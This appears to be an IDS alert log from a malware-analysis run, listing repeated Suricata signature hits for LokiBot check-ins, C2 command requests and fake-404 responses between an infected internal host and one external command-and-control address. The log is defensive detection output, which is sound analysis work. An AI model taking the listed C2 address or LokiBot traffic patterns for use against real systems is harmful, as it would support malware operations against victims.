Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49824 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49821 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49824 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49811 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49811 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49828 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49828 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49812 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49793 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49781 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49834 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49811
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49783
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49834 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49780
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49792 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49831 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49824
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49736
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49828 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49834 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49834 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49828 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49800 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49828 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49800 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49792 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49792 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49792
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49814 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49814 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49814 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49814 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49814 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49814
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49819 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49819 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49839 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49782 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49782 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49781
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49839 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49774 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49795 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49795 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49795 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49766
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49770 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49770 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49770 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49812 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49822 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49786
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49831 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49735
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49819
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49817 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49817 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49817 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49770 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49770 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49761 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49844 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49844 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49844 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49774 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49821
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49812
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49761 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49822 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49761 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49774
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49795 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49822 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49795 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49834
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49831 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49782 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49804 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49817 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49839 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49793 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49793 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49782 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49828
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49822 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49761
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49836 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49822 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49839 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49784 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49784 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49784 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49782 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49733
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49793 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49782
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49804 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49804 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49831
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49789 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49815 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49789 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49789 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49844 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49836
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49839
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49822
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49817 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49817
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49794 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49794 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49794 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49804 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49784 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49844 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49784 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49793 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49813 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49794 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49813 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49789 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49813 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49789 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49815 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49797 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49800
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49764 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49797 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49804 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49793
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49815 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49789
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49815 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49815 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49810 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49810 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49810 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.66.231.242:80 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49764 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49764 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49797 -> 45.66.231.242:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49813 -> 45.66.231.242:80
